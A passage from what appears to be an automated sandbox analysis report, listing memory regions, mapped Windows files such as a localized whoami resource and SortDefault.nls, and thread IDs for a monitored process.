"\\Windows\\SysWOW64\\en-US\\whoami.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\whoami.exe.mui") Region: id = 6233 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 6234 start_va = 0x7a0000 end_va = 0x7a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 6235 start_va = 0x5e80000 end_va = 0x61b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6236 start_va = 0x7b0000 end_va = 0x7b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Thread: id = 430 os_tid = 0x43c Thread: id = 431 os_tid = 0x7f0 Thread: id = 432 os_tid = 0xb64